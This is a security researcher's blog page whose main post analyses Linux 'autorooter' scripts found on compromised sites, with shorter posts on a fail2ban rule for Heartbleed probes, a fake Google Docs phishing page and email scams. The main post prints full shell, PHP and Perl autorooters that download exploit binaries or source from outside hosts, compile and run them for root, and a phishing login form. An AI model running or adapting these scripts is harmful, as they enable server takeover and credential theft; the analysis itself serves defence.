Reflection on Autorooter beaviour and facts Step 1

Rédigé par genuix - 26 mai 2014 11:55

 

Finding malware, or king of viruses hidden on the internet inside legitimate websites aren't new, if you know the #MalwareMustDie group is doing its best to clean the network from this kind of things.

As you may know how efficient they are ;-)

This has to be pointed out and action have to be taken to avoid “too easy” autorooter to spread word wide and contaminates servers word wide.

By So many ways this can be used on most Linux/Uni* like and now Max OS X servers. The first part is to upload the malicious script by all kind of ways (by finding CMS or php scripts vulnerables as WorldPress, Joomla and so on).

While sleuthing over many web site underground and foreground, my attention was attracted by a whole lot of script known as autorooter. Written in different programming languages ​such as ​python, perl, php, asp or bash (in most cases) and some more rare compiled as C.

These scripts contain only simple code no frills and just wanting effectiveness for most linux/Uni* systems as being generic as possible, making them as portable and effective as possible.

The script it self contain at first an header with link to the interpreter to use (as usual for any kind of scripts), followed by some word by the authors :

Let's begin with an simple one:

#!/bin/sh 
# IrIsT Auto Rooter Exploiter Script v.1.0 
# Author : Beni_Vanda 
# IrIsT.Ir 
# Greetz to : Amir ,C0dex ,B3HZ4D ,TaK.FaNaR ,Dead.Zone ,M3hdi ,AlrZ , , Dr.Tofan and All Members In Www.IrIsT.Ir 

function Is_Rooted 
{ 
 if [ "$(id -u)" = "0" ]; 
 then 
 echo "Rooted :D The_End :D ... "; 
 exit; 
 else 
 rm rooter; 
 echo "Not Root :| . Try Again ... "; 
 echo ""; 
 fi; 
} 

function Try_To_Root 
{ 
  for line in `cat Rooter_List.txt` 
  do 
  wget -O rooter $line 
  chmod 0777 rooter 
  ./rooter 
  Is_Rooted; 
  done 
} 

function main_rooter 
{ 
 mkdir irist_rooter && cd irist_rooter; 
 wget  hxxp://benivanda.persiangig.com/autorooter/Rooter_List.txt 
 Try_To_Root; 
} 

main_rooter; 

As you can see there is (in this case) 3 very simple functions, one to execute all the exploits listed in the file downloaded in 3rd function, and the 2nd to test if it was successful or not.

Nothing new or special here that deserves to be discussed here.

What I would point out here is the most interesting to me is the 3rd function (the first executed):

It download a file containing a list of exploits binaries directly from the web, which exploits will be tested agains't the host to try to own it.

The Point is: the exploit seams to be hosted in a simple web server, a quiet site.

Let's take a look:

The root web server h00p://benivanda.persiangig.com/ land in a front page claiming to be owned/pawned by an Iranian hacker group.

 

 

 

 

 

 

 

 

 

The “autorooter” sub folder is more interesting:

It contains more than a hundred exploits binaries that just have to be downloaded in a victim server and executed. If only one of the exploits is successful then the server is pawned.

About the hosting simple Information gattering leads to :

====== Live Reverse Lookup ===========
Host IP: 198.143.177.74
Hostname: benivanda.persiangig.com
Path: /autorooter/Rooter_List.txt

====== Live Reverse Lookup ===========
Live Reverse Lookup:     cs09-prod.1g-1t.co

====== CymRu Whois infos =============
ASN:     32475
IP:     198.143.177.74
IP Prefix:     198.143.176.0/20
Country Code:     US
Owner:     SINGLEHOP-INC - SingleHop,US

====== Standard Whois infos =========
NetRange:     198.143.128.0 - 198.143.191.255
CIDR:     198.143.128.0/18
OrgName:     SingleHop, Inc.
City:     Chicago
OrgAbuseEmail:     
StateProv:     IL
Country:     US

This webhosting company seams to have been exploited for a while as I found (at least) 4 others subdomains with same kind of "resources" some source code seamed to be used since 2011:

benivanda.persiangig.com
bl4ck-viper.persiangig.com
net-edit0r.persiangig.com
opanic.persiangig.com
kabooos.persiangig.com

But they aren't alone in this case, so many other domains have been found owned.

Exemple:(i shortened it as it is very poorly coded with so many simples lines....)

#!/usr/bin/php
<?php

######################################
#                                    #
#        Copyright © S1r_z3r0        #
#                                    #
######################################


echo "
    ___         __           ____              __ 
   /   | __  __/ /_____     / __ \____  ____  / /_
  / /| |/ / / / __/ __ \   / /_/ / __ \/ __ \/ __/
 / ___ / /_/ / /_/ /_/ /  / _, _/ /_/ / /_/ / /_  
/_/  |_\__,_/\__/\____/  /_/ |_|\____/\____/\__/  
                                                  
";

echo " 
######################################
#  PHP Script - Auto Root For Linux  #
#        Coded By : S1r_z3r0         #
#          x2[at]hotmail.fr          #
#     http://fb.com/S1r.z3r0.Jo      #
######################################
"."\n"."\n";


$command=array(
'wget1'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/1-2',
'wget4'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2',
'wget5'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2-1',
…....
'wget60'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/ubuntu',
'wget61'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/vmsplice-local-root-exploit',
'wget62'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/z1d-2011',
'wget63'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2.6.18-374.12.1.el5-2012'
);
$chmod=array(
'chmod1'=>'chmod 777 1-2',
'chmod2'=>'chmod 777 1-3',
'chmod3'=>'chmod 777 1-4',
…....
'chmod61'=>'chmod 777 vmsplice-local-root-exploit',
'chmod62'=>'chmod 777 z1d-2011',
'chmod63'=>'chmod 777 2.6.18-374.12.1.el5-2012'
);
$run=array(
'run1'=>'./1-2',
'run2'=>'./1-3',
'run30'=>'./7x',
'run31'=>'./8',
…....
'run50'=>'./exploit',
'run51'=>'./full-nelson',
'run60'=>'./ubuntu',
'run61'=>'./vmsplice-local-root-exploit',
'run62'=>'./z1d-2011',
'run63'=>'./2.6.18-374.12.1.el5-2012'
);

echo "Server Rooting ..."."\n"."\n";
shell_exec($command['wget1']);
shell_exec($chmod['chmod1']);
shell_exec($run['run1']);
echo shell_exec("id");
…...
shell_exec($command['wget63']);
shell_exec($chmod['chmod63']);
shell_exec($run['run63']);
echo shell_exec("id");
echo "\n"."\n"."All Done , Bye ~"."\n"."\n";
?>

In this case the coder don't even know about function and routines to simplify the code ….any way the interesting part is again that the exploits are located in a web site from another hacker, which own lots of exploits.

Any way this (Baributz seams to have disappeared (since 2012) but their web site still live and distribute exploit and code useful for scripts kiddies or evil hackers).

More interesting, this one, it gets the exploit directly from the source, from h00p://www[.]exploit-db[.]com/ a well known database references for exploit:

<h7m1>
<headdd>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>exploit Root ~ JxH</title>
</head>
<body>
<div style="text-align: center;">JaBr<span style="color: red;">O</span>tHaCkEr<br>
<br>
</div>
</body>
</html>

<ol>
<strong>
<?
#c0d3r : Al7rby
#Rights : JaBrOt HaCkEr ~ 

@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);

echo "<pre>"; 

@unlink("jxh.txt");
execute("yum list installed |awk {' print $1 '} |awk -F'.' {' print $1 '} > jxh.txt");
$apps = @file('jxh.txt');
(!$apps) ? die("Error::jxh.txt Not Exist , Means Can't execute with PHP ."):"";

echo "<p># There is : [".count($apps)."] Application</p>";

foreach($apps as $app){
  $app = str_replace(array("\n","\r"),"",$app); 
  echo (exploit_db($app)) ? "[+] Found ( <b>$app</b> ) : <a href=hxxp://www[.]exploit-db[.]com/search/?action=search&filter_description=$app>here</a>\n":"[-] Not Found ( $app )\n";
}

function exploit_db($wht){
  $result = @file_get_contents("hxxp://www[.]exploit-db[.]com/search/?action=search&filter_page=1&filter_description=$wht&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="); 
  flush();flush();
  return (eregi("No results",$result)) ? false:true;
}

function execute($command){
    global $os;
    if(function_exists('passthru')){$exec = passthru($command);}
    elseif(function_exists('system') && !$exec){$exec= system($command); }
    elseif(function_exists('exec') && !$exec){exec($command,$output);$exec=join("\n",$output);}
    elseif(function_exists('shell_exec') && !$exec){$exec=shell_exec($command);}
    elseif(function_exists('popen') && !$exec){$fp = popen($command,"r");
    {while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}$exec = convert_cyr_string($result,"d","w");}
    elseif(function_exists('win_shell_execute') && !$exec){$exec = winshell($command);}
    elseif(function_exists('win32_create_service') && !$exec){$exec=srvshell($command);}
    elseif(extension_loaded('ffi') && !$exec){$exec=ffishell($command);}
    elseif(extension_loaded('perl') && !$exec){$exec=perlshell($command);}
    elseif(!$exec) {$exec = slashBypass($command);}
    elseif(!$exec && extension_loaded('python'))
    {$exec = python_eval("import os
    pwd = os.getcwd()
    print pwd
    os.system('".$command."')");}
    elseif($exec){return $exec;}
} 

?>
</strong>
</ol>
<html>
<head>
<title></title>
</head>
<body>
<div style="text-align: center;">© <span style="font-weight: bold;">J<span style="color: red;">x</span>H</span> 2010<br>
</div>
<div style="text-align: center;"></div>
</body>
</html>

As you can see at line 26 the scripts look after all installed package (as the issued command is yum it's against RedHat|Fedora|centos flavored linux distributions except that you can install yum package manager even in debian …. any way).
And then it looks to exploit-db to find an exploit that match installed package at the same version and release, download it, compile it and try it. This seams pretty accurate as you get the release and the issue of the applications and then ask exploit-DB only for those potential exploit.

Another intersesting way to do the same things is to use well known website "Pastebin[.]com", used to share with any body or your self simple text file or information alway available where ever you are as simple as copy and past.

Exemple:

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r ultimate )
#new links for exploits cuz we will be down for some time, check
#forum for new version with r00tw0rm.com links and updates
print "###########################################################\n";
print "#   (Beta 1.0)   Ultimate Auto rooter(ultimate) by CrosS   #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 rootult    => To root                         #\n";
print "#    perl $0 del        => Delete Exploit                  #\n"; 
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter           #\n";
print "#                  for grsec+PaX protected kernels =)      #\n";
print "#   in case of error mailto: mr.0x0day[AT]hotmail.com      #\n";
print "#                                                          #\n";
print "#        Thanks to: 1337day cr3w                           #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

                               
if ($ARGV[0] =~ "rootult" ){
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv raw.php?i=MMMMMMMM V9 2.6.18-ultimate.c");
system("gcc 2.6.18-ultimate.c -o 2.6.18-ultimate");
system("chmod 777 2.6.18-ultimate");
system("./2.6.18-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMMMM");
system("mv raw.php?i= MMMMMMMM 2.6.33-ultimate.c");
system("gcc 2.6.33-ultimate.c -o 2.6.33-ultimate");
system("chmod 777 2.6.33-ultimate");
system("./2.6.33-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv raw.php?i= MMMMMMMM 2.6.34-ultimate.c");
system("gcc -w 2.6.34-ultimate.c -o 2.6.34-ultimate");
system("sudo setcap cap_sys_admin+ep 2.6.34-ultimate");
system("./2.6.34-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMM");
system("mv raw.php?i= MMMMMMMM 2.6.37-ultimate.c");
system("gcc 2.6.37-ultimate.c -o 2.6.37-ultimate");
system("chmod 777 2.6.37-ultimate");
system("./2.6.37-ultimate7");
system("uname;id");
}
if ($ARGV[0] =~ "del" ){
print "All Ultimate Exploit deleting ...\n";
system("rm raw.php*;rm -rf raw.php*;rm 2.6*;rm -rf 2.6*");
}

As seen before a very simple Perl code with simple command.

In this example you need to know as much as you can about the server before trying this as you have to post the source code (binaries aren’t possible throught pastebin). Get the URL (generated by pastebin) and include it in your script.

When downloaded just compile an execute.

Conclusion:

That is the first step on the subject I'm talking about, next step will go deeper on the analysis.

This will only be the visible part of the iceberg, as I will try to show.

Cheers all, and Thanks again for the MalwareMustDie Crew for help and support.

 

Classé dans : AutoRooter - Mots clés : autorooter malware linux security MMD MalwareMustDie -

OpenSSL Heartbleed's case helped with fail2ban

Rédigé par genuix - 15 avril 2014 16:37

By using fail2 ban you can limit attempte to hack your server.

Create a filter file named by exemple: filter.d/openssl-heartbeat.conf

add in it :

[Definition]
failregex = [[]client <HOST>[]] (Invalid method in request \\x16\\x03)
ignoreregex =

 

then in the jail.conf add a section like this:

[openssl-heartbeat]
enabled  = true
port     = https
filter   = openssl-heartbeat
logpath  = /var/log/apache*/*error.log
maxretry = 2

and then restart the service:

service fail2ban restart

 

if you don't already have fail2ban installed you can find it here for your flavoured system.

http://www.fail2ban.org

As i could see the apache-overflows seams to ban already correctly but by this rules you can whatch after this attempt.

 

Classé dans : Non classé - Mots clés : aucun -

Fake Google Docs Leads to info stealer

Rédigé par genuix - 19 mars 2013 15:16

Fake Email from legitimate sender (sender must be infected). leads to fishing website to steal username passwods if the user complete the forms

Hi, Please i want you to view the Important document i uploaded using Google Doc. i want you to see.

click on http//google.doc.com "\<"http://sib-komfort.ru/images/sss/index.htm"\>" and log on with your email for immediate access to view.

Obviously seen the real URL isn't an google page.

As usual take real care of what you click on .... part source code show :

<code>
<!-- GMAIL CONFIG !--> 
<div id="toggleTextgmail" style="display: none"> 
<p><img src="./Remax - Secure Login_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="gmail" method="post" action="gmail.php" onsubmit="return ValidateFormGmail()"> 
<p> 
 
				<label>Gmail Email Address:</label> 

                <br> 
				<input name="gmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Gmail Password</label> 
                <br> 
				<input name="gmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_gmail" value="Sign in" type="submit"> 
			</p> 
            </form> 
</code>

and then redirect you to remax.com 

URLQuery result : http://62.249.178.200/report.php?id=1516639

Vurustotal result : https://www.virustotal.com/en/url/13d9e8dbf0ca342c5528c2ea099a775589c73baf7bfea85009c39e836cee738c/analysis/

Classé dans : Non classé - Mots clés : aucun -

Fake Swisscom MMS email

Rédigé par genuix - 12 mars 2013 16:51

Un faux message au design Swisscom vous annoncant que vous avez reçus un nouveau MMS contient un Virus:

Virus Total :

https://www.virustotal.com/en/file/f203....

l' emails ne contient que le sujet: MMS

le logo Swisscom

le numero du correspondant: +417x xxx xx xx (Ce qui tant a supposé que le sender (ou le propagateur), c'est fait véroler son carnet d'adresse).

et le paragraphe:

en allemand:

"Wenn der Adressat ein MMS nicht empfangen kann (weil er kein MMS-fähiges Handy hat oder wenn mit seinem Netzanbieter keine MMS ausgetauscht werden können) erhält er ein SMS mit einer MMS-ID. Auf der Website von Swisscom kann er das MMS mit dieser MMS-ID abrufen. "

PS: Fichier executable en cours d'analyse more infos soon...

Classé dans : Scam - Mots clés : scam swisscom infos stealer -

Domaine Service Scam

Rédigé par genuix - 05 mars 2013 11:45

 

Just recived this morning, well known (http://www.npinc.ca/a-domain-service-search-engine-submission-scam/) scam Proposal for Search Engine Submission.

With full of strange beaviour:

-1 A Domaine service that have an Email address at hotmail (domainindo25658 at htomail dot com ) ?!?!?!? no way !!! that coul'd be real.

-2 the requester ask you to returne a FAX (guess that a good way that you coul'd deny to agreed to the solicitation).

-3 By looking a t the email source code you will find the script taht generate the scam: X-PHP-Script: 198,8,83,250/~domainin/info/mail_new2,php for 174,36,187,73

to be continued ===>

Classé dans : Non classé - Mots clés : aucun -

page 1 sur 2 suivante

Catégories

Archives

Mots clés

Derniers articles